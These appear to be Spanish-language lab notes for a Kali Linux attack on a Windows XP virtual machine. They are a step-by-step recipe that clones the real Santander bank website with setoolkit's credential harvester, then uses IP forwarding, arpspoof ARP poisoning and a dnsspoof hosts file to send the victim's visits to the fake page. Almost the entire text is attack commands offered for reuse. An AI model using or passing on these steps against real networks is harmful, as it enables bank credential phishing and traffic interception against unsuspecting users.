XP: 10.0.2.4
KALI: 10.0.2.15
Poner teclado en espaƱol: setxbmap es
setoolkit
set>1 (Social-Engineering Attacks)
set>2 Website Attacks Vectors
set>3 (Credential Harvester Attack Method)
set>2 (Site Cloner)
set:webattack>IP address for the POST back in Harvester/Tabnabbing [10.0.2.15]
set:webattack>Enter the url to clone: https://www.bancosantander.es
Press {return} if you understand what we're saying here.
(No cerrar el terminal)
Vamos a el navegador y ponemos: localhost
Nos debe aparecer la web clonada del bancosantander
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 10.0.2.4 10.0.2.1 -r
Creamos un archivo x.txt con el contenido:
10.0.2.15 bancosantander.es
10.0.2.15 probando.com
Ejecutamos el siguiente comando:
dnsspoof -i eth0 -f x.txt
En el navegador ponemos:
10.0.2.15
probando.com
Veremos la pagina del bancosantander pero sin el candado de seguridad.